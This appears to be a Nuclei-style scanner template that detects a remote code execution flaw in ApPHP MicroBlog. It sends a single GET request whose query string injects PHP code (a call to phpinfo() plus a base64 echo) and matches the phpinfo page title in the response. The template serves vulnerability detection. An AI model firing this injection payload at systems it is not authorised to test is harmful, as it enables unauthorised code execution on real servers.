id: ApPHP-MicroBlog-rc

info:
  name:  ApPHP-MicroBlog-rce.yaml
  author: nithissh
  severity: hight

requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?b);phpinfo();echo(base64_decode('T3BlblZBUwo')=/"
    matchers:
      - type: word
        words:
          - "<title>phpinfo()"
        part: body
